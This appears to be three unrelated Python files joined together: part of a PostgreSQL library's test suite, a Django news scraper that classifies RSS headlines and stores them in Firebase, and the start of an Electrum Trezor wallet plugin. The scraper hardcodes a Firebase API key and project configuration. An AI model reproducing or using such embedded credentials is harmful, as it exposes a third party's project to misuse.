actual = str(TooMany(2, 1, 1))
assert actual == "Got 2 rows; expecting exactly 1."
def test_TooMany_message_is_helpful_for_a_range(self):
actual = str(TooMany(4, 1, 3))
assert actual == "Got 4 rows; expecting between 1 and 3 (inclusive)."
class TestOne(WithData):
def test_one_raises_TooFew(self):
with self.assertRaises(TooFew):
self.db.one("CREATE TABLE foux (baar text)")
def test_one_rollsback_on_error(self):
try:
self.db.one("CREATE TABLE foux (baar text)")
except TooFew:
pass
with self.assertRaises(ProgrammingError):
self.db.all("SELECT * FROM foux")
def test_one_returns_None(self):
actual = self.db.one("SELECT * FROM foo WHERE bar='blam'")
assert actual is None
def test_one_returns_default(self):
class WHEEEE: pass # noqa: E701
actual = self.db.one("SELECT * FROM foo WHERE bar='blam'", default=WHEEEE)
assert actual is WHEEEE
def test_one_raises_default(self):
exception = RuntimeError('oops')
try:
self.db.one("SELECT * FROM foo WHERE bar='blam'", default=exception)
except Exception as e:
if e is not exception:
raise
else:
raise AssertionError('exception not raised')
def test_one_returns_default_after_derefencing(self):
default = 0
actual = self.db.one("SELECT NULL AS foo", default=default)
assert actual is default
def test_one_raises_default_after_derefencing(self):
exception = RuntimeError('oops')
try:
self.db.one("SELECT NULL AS foo", default=exception)
except Exception as e:
if e is not exception:
raise
else:
raise AssertionError('exception not raised')
def test_one_returns_one(self):
actual = self.db.one("SELECT * FROM foo WHERE bar='baz'")
assert actual == "baz"
def test_one_accepts_a_dict_for_bind_parameters(self):
actual = self.db.one("SELECT %(bar)s as bar", {"bar": "baz"})
assert actual == "baz"
def test_one_accepts_a_tuple_for_bind_parameters(self):
actual = self.db.one("SELECT %s as bar", ("baz",))
assert actual == "baz"
def test_one_accepts_bind_parameters_as_keyword_arguments(self):
actual = self.db.one("SELECT %(bar)s as bar", bar='baz')
assert actual == "baz"
def test_one_doesnt_choke_on_values_column(self):
actual = self.db.one("SELECT 1 AS values")
assert actual == 1
def test_one_raises_TooMany(self):
self.assertRaises(TooMany, self.db.one, "SELECT * FROM foo")
def test_one_raises_BadBackAs(self):
with self.assertRaises(BadBackAs) as context:
self.db.one("SELECT * FROM foo LIMIT 1", back_as='foo')
assert str(context.exception) == (
"%r is not a valid value for the back_as argument.\n"
"The available values are: Row, dict, namedtuple, tuple."
) % 'foo'
# db.cache
# ========
class TestCache(TestCase):
def setUp(self):
self.db = Postgres(cache=Cache(max_size=1), cursor_factory=SimpleTupleCursor)
self.db.run("DROP SCHEMA IF EXISTS public CASCADE")
self.db.run("CREATE SCHEMA public")
self.db.run("CREATE TABLE foo (key text, value int)")
self.db.run("INSERT INTO foo VALUES ('a', 1)")
self.db.run("INSERT INTO foo VALUES ('b', 2)")
def test_one_returns_cached_row(self):
query = "SELECT * FROM foo WHERE key = 'a'"
r1 = self.db.one(query, max_age=10)
r2 = self.db.one(query, max_age=10)
assert r2 is r1
def test_all_returns_cached_rows(self):
query = "SELECT * FROM foo ORDER BY key"
r1 = self.db.all(query, max_age=10)
r2 = self.db.all(query, max_age=10)
assert r2 == r1
assert r2 is not r1
assert r2[0] is r1[0]
def test_back_as_is_compatible_with_caching(self):
query = "SELECT * FROM foo WHERE key = 'a'"
r1 = self.db.one(query, back_as=dict, max_age=10)
r2 = self.db.one(query, back_as=namedtuple, max_age=10)
assert r1 == r2._asdict()
rows = self.db.all(query, back_as='Row', max_age=10)
assert rows == [r1]
def test_all_returns_row_cached_by_one(self):
query = "SELECT * FROM foo WHERE key = 'a'"
row = self.db.one(query, max_age=10)
rows = self.db.all(query, max_age=10)
assert rows == [row]
assert rows[0] is row
def test_one_raises_TooMany_when_the_cache_contains_multiple_rows(self):
query = "SELECT * FROM foo"
rows = self.db.all(query, max_age=10)
assert len(rows) == 2
with self.assertRaises(TooMany):
self.db.one(query, max_age=10)
def test_cache_max_size(self):
query1 = b"SELECT * FROM foo WHERE key = 'a'"
query2 = b"SELECT * FROM foo WHERE key = 'b'"
self.db.all(query1, max_age=10)
assert set(self.db.cache.entries.keys()) == {query1}
self.db.all(query2, max_age=10)
assert set(self.db.cache.entries.keys()) == {query2}
def test_cache_max_age(self):
query = b"SELECT * FROM foo WHERE key = 'a'"
r1 = self.db.one(query, max_age=0)
r2 = self.db.one(query, max_age=10)
assert r2 is not r1
def test_cache_prune(self):
self.db.cache.max_size = 2
query1 = b"SELECT * FROM foo WHERE key = 'a'"
query2 = b"SELECT * FROM foo WHERE key = 'b'"
self.db.one(query1, max_age=-1)
self.db.one(query2, max_age=10)
assert set(self.db.cache.entries.keys()) == {query1, query2}
self.db.cache.prune()
assert set(self.db.cache.entries.keys()) == {query2}
def test_cache_prevents_concurrent_queries(self):
with self.db.get_cursor() as cursor:
cursor.run("LOCK TABLE foo IN EXCLUSIVE MODE")
def insert():
self.db.one("INSERT INTO foo VALUES ('c', 3) RETURNING *", max_age=1)
t1 = Thread(target=insert)
t2 = Thread(target=insert)
t1.start()
t2.start()
cursor.run("COMMIT") # this releases the table lock
t1.join()
t2.join()
n = self.db.one("SELECT count(*) FROM foo WHERE key = 'c'")
assert n == 1
# db.get_cursor
# =============
class TestCursor(WithData):
def test_get_cursor_gets_a_cursor(self):
with self.db.get_cursor(cursor_factory=SimpleDictCursor) as cursor:
cursor.execute("INSERT INTO foo VALUES ('blam')")
cursor.execute("SELECT * FROM foo ORDER BY bar")
actual = cursor.fetchall()
assert actual == [{"bar": "baz"}, {"bar": "blam"}, {"bar": "buz"}]
def test_transaction_is_isolated(self):
with self.db.get_cursor() as cursor:
cursor.execute("INSERT INTO foo VALUES ('blam')")
cursor.execute("SELECT * FROM foo ORDER BY bar")
actual = self.db.all("SELECT * FROM foo ORDER BY bar")
assert actual == ["baz", "buz"]
def test_transaction_commits_on_success(self):
with self.db.get_cursor() as cursor:
cursor.execute("INSERT INTO foo VALUES ('blam')")
cursor.execute("SELECT * FROM foo ORDER BY bar")
actual = self.db.all("SELECT * FROM foo ORDER BY bar")
assert actual == ["baz", "blam", "buz"]
def test_transaction_rolls_back_on_failure(self):
try:
with self.db.get_cursor() as cursor:
cursor.execute("INSERT INTO foo VALUES ('blam')")
cursor.execute("SELECT * FROM foo ORDER BY bar")
raise Heck
except Heck:
pass
actual = self.db.all("SELECT * FROM foo ORDER BY bar")
assert actual == ["baz", "buz"]
def test_cursor_rollback_exception_is_ignored(self):
try:
with self.db.get_cursor() as cursor:
cursor.connection.close()
raise Heck
except Heck:
pass
def test_we_close_the_cursor(self):
with self.db.get_cursor() as cursor:
cursor.execute("SELECT * FROM foo ORDER BY bar")
with self.assertRaises(InterfaceError):
cursor.fetchall()
def test_monkey_patch_execute(self):
expected = "SELECT 1"
def execute(this, sql, params=[]):
return sql
from postgres.cursors import SimpleCursorBase
SimpleCursorBase.execute = execute
with self.db.get_cursor() as cursor:
actual = cursor.execute(expected)
del SimpleCursorBase.execute
assert actual == expected
def test_autocommit_cursor(self):
try:
with self.db.get_cursor(autocommit=True) as cursor:
try:
cursor.execute("INVALID QUERY")
except ProgrammingError:
pass
cursor.execute("INSERT INTO foo VALUES ('blam')")
with self.db.get_cursor() as cursor:
n = cursor.one("SELECT count(*) FROM foo")
assert n == 3
raise KeyboardInterrupt()
except KeyboardInterrupt:
pass
with self.db.get_cursor() as cursor:
n = cursor.one("SELECT count(*) FROM foo")
assert n == 3
def test_readonly_cursor(self):
try:
with self.db.get_cursor(readonly=True) as cursor:
cursor.execute("INSERT INTO foo VALUES ('blam')")
except ReadOnlySqlTransaction:
pass
def test_get_cursor_supports_subtransactions(self):
before_count = self.db.one("SELECT count(*) FROM foo")
with self.db.get_cursor(back_as='dict') as outer_cursor:
outer_cursor.execute("INSERT INTO foo VALUES ('lorem')")
with self.db.get_cursor(cursor=outer_cursor) as inner_cursor:
assert inner_cursor is outer_cursor
assert inner_cursor.back_as == 'dict'
inner_cursor.execute("INSERT INTO foo VALUES ('ipsum')")
after_count = self.db.one("SELECT count(*) FROM foo")
assert after_count == (before_count + 2)
def test_subtransactions_do_not_swallow_exceptions(self):
before_count = self.db.one("SELECT count(*) FROM foo")
try:
with self.db.get_cursor() as cursor:
cursor.execute("INSERT INTO foo VALUES ('lorem')")
with self.db.get_cursor(cursor=cursor) as c:
c.execute("INSERT INTO foo VALUES ('ipsum')")
raise Heck
except Heck:
pass
after_count = self.db.one("SELECT count(*) FROM foo")
assert after_count == before_count
# db.get_connection
# =================
class TestConnection(WithData):
def test_get_connection_gets_a_connection(self):
with self.db.get_connection() as conn:
cursor = conn.cursor(cursor_factory=SimpleDictCursor)
cursor.execute("SELECT * FROM foo ORDER BY bar")
actual = cursor.fetchall()
assert actual == [{"bar": "baz"}, {"bar": "buz"}]
def test_connection_rollback_exception_is_ignored(self):
try:
with self.db.get_connection() as conn:
conn.close()
raise Heck
except Heck:
pass
def test_connection_has_get_cursor_method(self):
with self.db.get_connection() as conn:
with conn.get_cursor() as cursor:
cursor.execute("DELETE FROM foo WHERE bar = 'baz'")
with self.db.get_cursor(cursor_factory=SimpleDictCursor) as cursor:
cursor.execute("SELECT * FROM foo ORDER BY bar")
actual = cursor.fetchall()
assert actual == [{"bar": "buz"}]
def test_get_cursor_method_checks_cursor_argument(self):
with self.db.get_connection() as conn, self.db.get_cursor() as cursor:
with self.assertRaises(ValueError):
conn.get_cursor(cursor=cursor)
# orm
# ===
class TestORM(WithData):
class MyModel(Model):
__slots__ = ('bar', '__dict__')
typname = "foo"
def __init__(self, values):
Model.__init__(self, values)
self.bar_from_init = self.bar
def update_bar(self, bar):
self.db.run("UPDATE foo SET bar=%s WHERE bar=%s", (bar, self.bar))
self.set_attributes(bar=bar)
def setUp(self):
WithData.setUp(self)
self.db.register_model(self.MyModel)
def tearDown(self):
self.db.model_registry = {}
def installFlah(self):
self.db.run("CREATE TABLE flah (bar text)")
self.db.register_model(self.MyModel, 'flah')
def test_register_model_handles_schema(self):
self.db.run("DROP SCHEMA IF EXISTS foo CASCADE")
self.db.run("CREATE SCHEMA foo")
self.db.run("CREATE TABLE foo.flah (bar text)")
self.db.register_model(self.MyModel, 'foo.flah')
def test_register_model_raises_AlreadyRegistered(self):
with self.assertRaises(AlreadyRegistered) as context:
self.db.register_model(self.MyModel)
assert context.exception.args == (self.MyModel, self.MyModel.typname)
assert str(context.exception) == (
"The model MyModel is already registered for the typname foo."
)
def test_register_model_raises_NoSuchType(self):
with self.assertRaises(NoSuchType):
self.db.register_model(self.MyModel, 'nonexistent')
def test_register_model_raises_NoTypeSpecified(self):
with self.assertRaises(NoTypeSpecified):
self.db.register_model(Model)
def test_orm_basically_works(self):
one = self.db.one("SELECT foo FROM foo WHERE bar='baz'")
assert one.__class__ == self.MyModel
def test_orm_models_get_kwargs_to_init(self):
one = self.db.one("SELECT foo FROM foo WHERE bar='baz'")
assert one.bar_from_init == 'baz'
def test_updating_attributes_works(self):
one = self.db.one("SELECT foo FROM foo WHERE bar='baz'")
one.update_bar("blah")
bar = self.db.one("SELECT bar FROM foo WHERE bar='blah'")
assert bar == one.bar
def test_setting_unknown_attributes(self):
one = self.db.one("SELECT foo FROM foo WHERE bar='baz'")
with self.assertRaises(UnknownAttributes) as context:
one.set_attributes(bar='blah', x=0, y=1)
assert sorted(context.exception.args[0]) == ['x', 'y']
assert str(context.exception) == (
"The following attribute(s) are unknown to us: %s."
) % ', '.join(context.exception.args[0])
def test_attributes_are_read_only(self):
one = self.db.one("SELECT foo FROM foo WHERE bar='baz'")
with self.assertRaises(ReadOnlyAttribute) as context:
one.bar = "blah"
assert context.exception.args == ("bar",)
assert str(context.exception).startswith("bar is a read-only attribute.")
def test_check_register_raises_if_passed_a_model_instance(self):
obj = self.MyModel(['baz'])
raises(NotAModel, self.db.check_registration, obj)
def test_check_register_doesnt_include_subsubclasses(self):
class Other(self.MyModel): pass # noqa: E701
raises(NotRegistered, self.db.check_registration, Other)
def test_dot_dot_dot_unless_you_ask_it_to(self):
class Other(self.MyModel): pass # noqa: E701
assert self.db.check_registration(Other, True) == ['foo']
def test_check_register_handles_complex_cases(self):
self.installFlah()
class Second(Model): pass # noqa: E701
self.db.run("CREATE TABLE blum (bar text)")
self.db.register_model(Second, 'blum')
assert self.db.check_registration(Second) == ['blum']
class Third(self.MyModel, Second): pass # noqa: E701
actual = list(sorted(self.db.check_registration(Third, True)))
assert actual == ['blum', 'flah', 'foo']
def test_a_model_can_be_used_for_a_second_type(self):
self.installFlah()
self.db.run("INSERT INTO flah VALUES ('double')")
self.db.run("INSERT INTO flah VALUES ('trouble')")
flah = self.db.one("SELECT flah FROM flah WHERE bar='double'")
assert flah.bar == "double"
def test_check_register_returns_string_for_single(self):
assert self.db.check_registration(self.MyModel) == ['foo']
def test_check_register_returns_list_for_multiple(self):
self.installFlah()
actual = list(sorted(self.db.check_registration(self.MyModel)))
assert actual == ['flah', 'foo']
def test_unregister_unregisters_one(self):
self.db.unregister_model(self.MyModel)
assert self.db.model_registry == {}
def test_unregister_leaves_other(self):
self.db.run("CREATE TABLE flum (bar text)")
class OtherModel(Model): pass # noqa: E701
self.db.register_model(OtherModel, 'flum')
self.db.unregister_model(self.MyModel)
assert self.db.model_registry == {'flum': OtherModel}
def test_unregister_unregisters_multiple(self):
self.installFlah()
self.db.unregister_model(self.MyModel)
assert self.db.model_registry == {}
def test_add_column_doesnt_break_anything(self):
self.db.run("ALTER TABLE foo ADD COLUMN boo text")
one = self.db.one("SELECT foo FROM foo WHERE bar='baz'")
assert one.boo is None
def test_replace_column_different_type(self):
self.db.run("CREATE TABLE grok (bar int)")
self.db.run("INSERT INTO grok VALUES (0)")
class EmptyModel(Model): pass # noqa: E701
self.db.register_model(EmptyModel, 'grok')
# Add a new column then drop the original one
self.db.run("ALTER TABLE grok ADD COLUMN biz text NOT NULL DEFAULT 'x'")
self.db.run("ALTER TABLE grok DROP COLUMN bar")
# The number of columns hasn't changed but the names and types have
one = self.db.one("SELECT grok FROM grok LIMIT 1")
assert one.biz == 'x'
assert not hasattr(one, 'bar')
@mark.xfail(raises=AttributeError)
def test_replace_column_same_type_different_name(self):
self.db.run("ALTER TABLE foo ADD COLUMN biz text NOT NULL DEFAULT 0")
self.db.run("ALTER TABLE foo DROP COLUMN bar")
one = self.db.one("SELECT foo FROM foo LIMIT 1")
assert one.biz == 0
assert not hasattr(one, 'bar')
# SimpleCursorBase
# ================
class TestSimpleCursorBase(WithData):
def test_fetchone(self):
with self.db.get_cursor(cursor_factory=SimpleTupleCursor) as cursor:
cursor.execute("SELECT 1 as foo")
r = cursor.fetchone()
assert r == (1,)
def test_fetchone_supports_back_as(self):
with self.db.get_cursor() as cursor:
cursor.execute("SELECT 1 as foo")
r = cursor.fetchone(back_as=dict)
assert r == {'foo': 1}
cursor.execute("SELECT 2 as foo")
r = cursor.fetchone(back_as=tuple)
assert r == (2,)
def test_fetchone_raises_BadBackAs(self):
with self.db.get_cursor() as cursor:
cursor.execute("SELECT 1 as foo")
with self.assertRaises(BadBackAs) as context:
cursor.fetchone(back_as='bar')
assert str(context.exception) == (
"%r is not a valid value for the back_as argument.\n"
"The available values are: Row, dict, namedtuple, tuple."
) % 'bar'
def test_fetchmany(self):
with self.db.get_cursor(cursor_factory=SimpleTupleCursor) as cursor:
cursor.execute("SELECT 1 as foo")
r = cursor.fetchmany()
assert r == [(1,)]
def test_fetchmany_supports_back_as(self):
with self.db.get_cursor() as cursor:
cursor.execute("SELECT 1 as foo")
r = cursor.fetchmany(back_as=dict)
assert r == [{'foo': 1}]
cursor.execute("SELECT 2 as foo")
r = cursor.fetchmany(back_as=tuple)
assert r == [(2,)]
def test_fetchmany_raises_BadBackAs(self):
with self.db.get_cursor() as cursor:
cursor.execute("SELECT 1 as foo")
with self.assertRaises(BadBackAs) as context:
cursor.fetchmany(back_as='bar')
assert str(context.exception) == (
"%r is not a valid value for the back_as argument.\n"
"The available values are: Row, dict, namedtuple, tuple."
) % 'bar'
def test_fetchall(self):
with self.db.get_cursor(cursor_factory=SimpleTupleCursor) as cursor:
cursor.execute("SELECT 1 as foo")
r = cursor.fetchall()
assert r == [(1,)]
def test_fetchall_supports_back_as(self):
with self.db.get_cursor() as cursor:
cursor.execute("SELECT 1 as foo")
r = cursor.fetchall(back_as=dict)
assert r == [{'foo': 1}]
cursor.execute("SELECT 2 as foo")
r = cursor.fetchall(back_as=tuple)
assert r == [(2,)]
def test_fetchall_raises_BadBackAs(self):
with self.db.get_cursor() as cursor:
cursor.execute("SELECT 1 as foo")
with self.assertRaises(BadBackAs) as context:
cursor.fetchall(back_as='bar')
assert str(context.exception) == (
"%r is not a valid value for the back_as argument.\n"
"The available values are: Row, dict, namedtuple, tuple."
) % 'bar'
# cursor_factory
# ==============
class WithCursorFactory(WithSchema):
def setUp(self): # override
self.db = Postgres(cursor_factory=self.cursor_factory)
self.db.run("DROP SCHEMA IF EXISTS public CASCADE")
self.db.run("CREATE SCHEMA public")
self.db.run("CREATE TABLE foo (key text, value int)")
self.db.run("INSERT INTO foo VALUES ('buz', 42)")
self.db.run("INSERT INTO foo VALUES ('biz', 43)")
class TestNamedTupleCursorFactory(WithCursorFactory):
cursor_factory = SimpleNamedTupleCursor
def test_NamedDictCursor_results_in_namedtuples(self):
Record = namedtuple("Record", ["key", "value"])
expected = [Record(key="biz", value=43), Record(key="buz", value=42)]
actual = self.db.all("SELECT * FROM foo ORDER BY key")
assert actual == expected
assert actual[0].__class__.__name__ == 'Record'
def test_namedtuples_can_be_unrolled(self):
actual = self.db.all("SELECT value FROM foo ORDER BY key")
assert actual == [43, 42]
class TestRowCursorFactory(WithCursorFactory):
cursor_factory = SimpleRowCursor
def test_RowCursor_returns_Row_objects(self):
row = self.db.one("SELECT * FROM foo ORDER BY key LIMIT 1")
assert isinstance(row, Row)
rows = self.db.all("SELECT * FROM foo ORDER BY key")
assert all(isinstance(r, Row) for r in rows)
def test_Row_objects_can_be_unrolled(self):
actual = self.db.all("SELECT value FROM foo ORDER BY key")
assert actual == [43, 42]
def test_one(self):
r = self.db.one("SELECT * FROM foo ORDER BY key LIMIT 1")
assert isinstance(r, Row)
assert r[0] == 'biz'
assert r.key == 'biz'
assert r['key'] == 'biz'
assert r[1] == 43
assert r.value == 43
assert r['value'] == 43
assert repr(r) == "Row(key='biz', value=43)"
def test_all(self):
rows = self.db.all("SELECT * FROM foo ORDER BY key")
assert isinstance(rows[0], Row)
assert rows[0].key == 'biz'
assert rows[0].value == 43
assert rows[1].key == 'buz'
assert rows[1].value == 42
def test_iter(self):
with self.db.get_cursor() as cursor:
cursor.execute("SELECT * FROM foo ORDER BY key")
i = iter(cursor)
assert cursor.rownumber == 0
t = next(i)
assert isinstance(t, Row)
assert t.key == 'biz'
assert t.value == 43
assert cursor.rownumber == 1
assert cursor.rowcount == 2
t = next(i)
assert isinstance(t, Row)
assert t.key == 'buz'
assert t.value == 42
assert cursor.rownumber == 2
assert cursor.rowcount == 2
with self.assertRaises(StopIteration):
next(i)
assert cursor.rownumber == 2
assert cursor.rowcount == 2
def test_row_unpack(self):
foo, bar = self.db.one("SELECT 1 as foo, 2 as bar")
assert foo == 1
assert bar == 2
def test_row_comparison(self):
r = self.db.one("SELECT 1 as foo, 2 as bar")
assert r == r
assert r == (1, 2)
assert r == {'foo': 1, 'bar': 2}
assert r != None # noqa: E711
def test_special_col_names(self):
r = self.db.one('SELECT 1 as "foo.bar_baz", 2 as "?column?", 3 as "3"')
assert r['foo.bar_baz'] == 1
assert r['?column?'] == 2
assert r['3'] == 3
def test_nonascii_names(self):
r = self.db.one('SELECT 1 as \xe5h\xe9, 2 as \u2323')
assert getattr(r, '\xe5h\xe9') == 1
assert getattr(r, '\u2323') == 2
|
__init__.py
|
# Create your views here.
import feedparser
import nltk
from nltk.tag import StanfordPOSTagger
from nltk import word_tokenize
import os
import csv
import threading, time
from geograpy.extraction import Extractor
import firebase_admin
from firebase_admin import credentials, firestore
cred = credentials.Certificate("../DjangoBackendOne/news/newsapp-54f7c-firebase-adminsdk-wzja4-dc085fad0b.json")
firebase_admin.initialize_app(cred)
db = firestore.client()
jar = '../DjangoBackendOne/stanford-postagger-2018-10-16/stanford-postagger.jar'
model = '../DjangoBackendOne/stanford-postagger-2018-10-16/models/english-left3words-distsim.tagger'
java_path = "C:/Program Files/Java/jdk1.8.0_101/bin/java.exe"
os.environ['JAVAHOME'] = java_path
nltk.internals.config_java('C:/Program Files/Java/jdk1.8.0_101/bin/java.exe')
pos_tagger = StanfordPOSTagger(model, jar)
pos_tagger.java_options = '-mx4096m'
config = {
"apiKey": "AIzaSyBJumddViT3Y70F6vmEdP_1VMGXqEFaqgg",
"authDomain": "newsapp-54f7c.firebaseapp.com",
"databaseURL": "https://newsapp-54f7c.firebaseio.com",
"projectId": "newsapp-54f7c",
"storageBucket": "newsapp-54f7c.appspot.com",
"messagingSenderId": "841850292385"
}
# firebase = pyrebase.initialize_app(config)
newsObjects = []
entityCount = 1
nouns = []
adj = []
sportKeyWords = []
polKeyWords = []
busKeyWords = []
eduKeyWords = []
healthKeyWords = []
entKeyWords = []
class News:
# category = ''
# title = ''
# description = ''
# locations = []
# link = ''
# summery = ''
# date_time= ''
def __init__(self, title, description, summary, link, category, date_time, id):
self.category = category
self.title = title
self.description = description
self.summary = summary
self.link = link
self.date_time = date_time
self.news_id=id
def print_test(self):
print(self.title)
def add_locations(self, locations):
self.locations = locations
with open('../DjangoBackendOne/news/NewsCategoryData.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count == 0:
print(f'Column names are {", ".join(row)}')
line_count += 1
else:
# print(f'\t{row[0]} works in the {row[1]} department, and was born in {row[2]}.')
            # check whether each dataset cell holds a usable keyword string (skip digits and empty values)
# check the row 0 : business keywords
if row[0].isdigit() or row[0] == '':
row[0]
else:
busKeyWords.append(row[0])
# check the row 1 : sport keywords
if row[1].isdigit() or row[1] == '':
row[1]
else:
sportKeyWords.append(row[1])
# check the row 2 : politics keywords
if row[2].isdigit() or row[2] == '':
row[2]
else:
polKeyWords.append(row[2])
# check the row 3 : education keywords
if row[3].isdigit() or row[3] == '':
row[3]
else:
eduKeyWords.append(row[3])
            # check the row 4 : health keywords
if row[4].isdigit() or row[4] == '':
row[4]
else:
healthKeyWords.append(row[4])
# check the row 5 : entertainment keywords
if row[5].isdigit() or row[5] == '':
row[5]
else:
entKeyWords.append(row[5])
# busKeyWords.append(row[0])
# polKeyWords.append(row[2])
line_count += 1
print(f'Processed {line_count} lines.')
csv_file.close()
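# Expected column order in NewsCategoryData.csv (per the checks above):
# 0 = business, 1 = sport, 2 = politics, 3 = education, 4 = health,
# 5 = entertainment.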
class Counter:
counterName = None
counterValue = None
def check_with_sport_data():
global nouns
sportCount = 0
for n in nouns:
for s in sportKeyWords:
if n == s:
sportCount += 1
countObj = Counter()
countObj.counterName = 'sports'
countObj.counterValue = sportCount
return countObj
def check_with_pol_data():
global nouns
polCount = 0
for n in nouns:
for s in polKeyWords:
if n == s:
polCount += 1
countObj = Counter()
countObj.counterName = 'political'
countObj.counterValue = polCount
return countObj
def check_with_bus_data():
global nouns
busCount = 0
for n in nouns:
for s in busKeyWords:
if n == s:
busCount += 1
countObj = Counter()
countObj.counterName = 'business'
countObj.counterValue = busCount
return countObj
def check_with_edu_data():
global nouns
eduCount = 0
for n in nouns:
for s in eduKeyWords:
if n == s:
eduCount += 1
countObj = Counter()
countObj.counterName = 'education'
countObj.counterValue = eduCount
return countObj
def check_with_ent_data():
global nouns
entCount = 0
for n in nouns:
for s in entKeyWords:
if n == s:
entCount += 1
countObj = Counter()
countObj.counterName = 'entertainment'
countObj.counterValue = entCount
return countObj
def check_with_health_data():
global nouns
helCount = 0
for n in nouns:
for s in healthKeyWords:
if n == s:
helCount += 1
countObj = Counter()
countObj.counterName = 'health'
countObj.counterValue = helCount
return countObj
counterObjArray = []
categoryName = ''
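# classify_news: POS-tag the headline with the Stanford tagger, keep the nouns
# (tags starting with "N") and adjectives (tags starting with "J"), count how
# many of the nouns appear in each category keyword list, and return the
# category with the highest count ('sports' wins ties because it is checked
# first).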
def classify_news(news):
text = pos_tagger.tag(word_tokenize(news))
print(text)
global nouns
global adj
for i in text:
if i[1][0] == "N":
nouns += [i[0]]
elif i[1][0] == "J":
adj += [i[0]]
# for i in nouns:
# print(i)
    global counterObjArray
    global categoryName
    # reset counters from the previous article; without this, stale Counter
    # objects accumulate in counterObjArray and skew the max comparison below
    counterObjArray.clear()
counterObjArray.append(check_with_sport_data())
counterObjArray.append(check_with_pol_data())
counterObjArray.append(check_with_bus_data())
counterObjArray.append(check_with_edu_data())
counterObjArray.append(check_with_ent_data())
counterObjArray.append(check_with_health_data())
maxValue = counterObjArray[0].counterValue
categoryName = counterObjArray[0].counterName
for i in counterObjArray:
if i.counterValue > maxValue:
print('test counter details ', i.counterName, ' value ', i.counterValue)
maxValue = i.counterValue
categoryName = i.counterName
print('nouns test1 ', nouns)
nouns.clear()
print('nouns test ', nouns)
return categoryName
news_in_db=[]
def retrive_news_from_firebase():
print('running retrive_news_from_firebase')
global db,news_in_db
docs = db.collection(u'news').get()
try:
for doc in docs:
obj= News(doc._data['title'],doc._data['description'],doc._data['summary'],doc._data['link'],doc._data['category'],doc._data['date_time'],doc._data['news_id'])
obj.add_locations(doc._data['locations'])
news_in_db.append(obj)
print(' retrive_news_from_firebase complete')
except:
print('retrive_news_from_firebase() Error')
def is_news_already_exist_in_db(title):
print('running is_news_already_exist_in_db')
try:
global news_in_db
for news in news_in_db:
            if news.title == title:
print('True')
return True
except:
print('Error in is_news_already_exist_in_db()')
# retrieve the maximum news_id already stored and set entityCount to max + 1
def set_entityCount():
global news_in_db
max_entityCount=news_in_db[0].news_id
for news in news_in_db:
if max_entityCount< news.news_id:
max_entityCount=news.news_id
global entityCount
entityCount=max_entityCount+1
print('current index',entityCount)
def check_news_dataset():
global news_in_db
newsId=[]
with open('../DjangoBackendOne/news/NewsDataset.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
for row in csv_reader:
newsId.append(row[0])
csv_file.close()
with open('../DjangoBackendOne/news/NewsDataset.csv', 'a') as csvFile:
writer = csv.writer(csvFile)
for news in news_in_db:
for id in newsId:
if id != news.news_id:
row = [news.news_id, news.title, news.category, news.summary, news.description,
news.link,news.date_time]
writer.writerow(row)
csvFile.close()
def update_news_dataset(object):
row = [object.news_id,object.title,object.category,object.summary,object.description,object.link,object.date_time]
with open('../DjangoBackendOne/news/NewsDataset.csv', 'a') as csvFile:
writer = csv.writer(csvFile)
writer.writerow(row)
csvFile.close()
def collect_news():
print('Running collecting news')
retrive_news_from_firebase()
# check_news_dataset()
set_entityCount()
url = ["http://www.adaderana.lk/rss.php",
"http://www.hirunews.lk/rss/english.xml",
"https://www.news.lk/news?format=feed",
"https://srilankamirror.com/news?format=feed&type=rss",
"http://www.thesundayleader.lk/feed/",
"https://www.newsfirst.lk/feed/"
]
for url in url:
# print(url)
# read the rss feeds from urls
feedParsed = feedparser.parse(url)
# print(feedParsed)
# check whether the rss reading success or not
if feedParsed.feed != {}:
global news_in_db
global entityCount
for post in feedParsed.entries:
                if not is_news_already_exist_in_db(post.title):
category = classify_news(post.title)
newsObj = News(post.title, post.description, post.summary, post.link, category, post.published,entityCount)
newsObjects.append(newsObj)
locations = Extractor(text=post.description) # Extract location
locations.find_entities()
# print(locations.places) # locations is an array
newsObj.add_locations(locations.places)
# data = {
# "title": newsObj.title,
# "id":entityCount,
# "description": newsObj.description,
# "summary": newsObj.summery,
# "link": newsObj.link,
# "category": newsObj.category,
# "locations": newsObj.locations,
# "date_time": newsObj.date_time
# }
# firebase.database().set(data)
global db
doc_ref = db.collection(u'news').document()
doc_ref.set({
u'title':newsObj.title,
u'news_id':newsObj.news_id,
u'description': newsObj.description,
u'summary': newsObj.summary,
u'link': newsObj.link,
u'category': newsObj.category,
u'locations': newsObj.locations,
u'date_time': newsObj.date_time
})
update_news_dataset(newsObj)
# db.collection(u'newsAppData').document(u'news').set(newsObj)
print("feed " + str(newsObj.news_id) + " : " + str(newsObj.title))
print('category: ', category, '. time ', newsObj.date_time, ' . locations:', newsObj.locations)
entityCount = entityCount + 1
else:
print('Connection failed with url :', url)
WAIT_SECONDS = 100 # timer for thread
print(time.ctime())
news_in_db.clear()
threading.Timer(WAIT_SECONDS, collect_news).start()
# thred1 = threading.Thread(target= collect_news)
# thred1.start()
if os.environ.get('RUN_MAIN', None) != 'true':
default_app_config = 'mydjangoapp.apps.MydjangoappConfig'
collect_news()
# collect_news()
#
# WAIT_SECONDS=1
# def run_thread():
# print(time.ctime())
# threading.Timer(WAIT_SECONDS, run_thread).start()
#
# run_thread()
# docs = db.collection(u'news').get()
#
# for doc in docs:
# print('###################################################')
|
plugin.py
|
import base64
import re
import threading
from binascii import hexlify, unhexlify
from functools import partial
from electrum.bitcoin import (bc_address_to_hash_160, xpub_from_pubkey,
public_key_to_p2pkh, EncodeBase58Check,
TYPE_ADDRESS, TYPE_SCRIPT,
TESTNET, ADDRTYPE_P2PKH, ADDRTYPE_P2SH)
from electrum.i18n import _
from electrum.plugins import BasePlugin, hook
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class TrezorCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Electrum and %s encryption and decryption are currently incompatible') % self.device)
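        # NOTE: the code below this raise is unreachable; it appears to be the
        # original decrypt flow, kept for reference.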
client = self.get_client()
